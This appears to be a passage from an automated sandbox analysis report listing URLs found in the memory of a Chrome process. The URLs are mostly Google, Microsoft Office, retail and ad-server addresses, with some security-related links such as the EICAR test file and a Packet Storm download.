Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000008.00000003.990110840.000009B400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139905948.000009B401440000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136206579.000009B400E94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onenote.com
Source: chrome.exe, 00000008.00000002.2141993291.000009B401A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143549040.000009B4020B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1082721228.000009B40172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143702868.000009B4020DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000008.00000002.2139031689.000009B401314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1689043206&target=OPTIMIZATION_TARGET_VIS
Source: chrome.exe, 00000008.00000002.2141993291.000009B401A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143549040.000009B4020B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1082721228.000009B40172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139031689.000009B401314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1110933299.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137867691.000009B40114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1916097075.000009B4022A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1691042511&target=OPTIMIZATION_TARGET_NEW
Source: chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139031689.000009B401314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1715213284&target=OPTIMIZATION_TARGET_TEX
Source: chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139031689.000009B401314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870342&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870385&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870420&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079789&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079821&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079854&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000008.00000002.2142398431.000009B401C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728918159&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000008.00000002.2142398431.000009B401C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130054872.000009B40015C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728918182&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000008.00000003.1161131124.000009B402294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143908946.000009B402294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137770733.000009B401130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143702868.000009B4020DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1729004809&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000008.00000002.2140494319.000009B401550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143702868.000009B4020DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1729888136&target=OPTIMIZATION_TARGET_TEX
Source: chrome.exe, 00000008.00000002.2141993291.000009B401A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1629891828.000009B40135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143549040.000009B4020B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139229508.000009B401364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1082721228.000009B40172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139031689.000009B401314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2142398431.000009B401C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=2311071436&target=OPTIMIZATION_TARGET_WEB
Source: chrome.exe, 00000008.00000002.2142398431.000009B401C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042095&target=OPTIMIZATION_TARGET_S
Source: chrome.exe, 00000008.00000002.2138995045.000009B401308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138955931.000009B4012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com
Source: chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://passwords.google/
Source: chrome.exe, 00000008.00000003.970199396.000009B4011D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134978060.000009B400C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poshmark.com/bundles/shop
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://recoveringlib.blogspot.com/
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rest.co.il
Source: chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000008.00000002.2129590881.000009B400094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129871752.000009B400110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure-oldnavy.gap.com/shopping-bag
Source: chrome.exe, 00000008.00000002.2136147812.000009B400E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.newegg.com/shop/cart
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135770117.000009B400E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000008.00000002.2132840549.000009B40087B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1002628944.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://servedby.flashtalking.com/container/13539;99030;10307;iframe/?ftXRef=&ftXValue=&ftXType=&ftX
Source: chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134091279.000009B400AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046293799.000009B4020E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com
Source: chrome.exe, 00000008.00000002.2130491850.000009B400248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136003376.000009B400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137770733.000009B401130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/?ms.officeurl=setup
Source: chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046293799.000009B4020E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134091279.000009B400AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129590881.000009B400094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132840549.000009B400848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046293799.000009B4020E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup
Source: chrome.exe, 00000008.00000002.2134091279.000009B400AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132840549.000009B400848000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 00000008.00000003.1000143016.000009B401C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942427852.000009B0005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942528995.000009B0005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942742503.000009B0005CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shop.lululemon.com/shop/mybag
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com
Source: chrome.exe, 00000008.00000002.2135364167.000009B400D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140833525.000009B4016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134871796.000009B400C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skype.com
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985730131.000009B4019E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985825773.000009B4019F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985785507.000009B4019E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/cart/
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.usps.com/store/cart/cart.jsp
Source: chrome.exe, 00000008.00000002.2130945695.000009B400364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134978060.000009B400C8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: chrome.exe, 00000008.00000002.2127856175.000009B00006C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: chrome.exe, 00000008.00000002.2135770117.000009B400E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tpc.googlesyndication.com/sodar/Enqz_20U.html
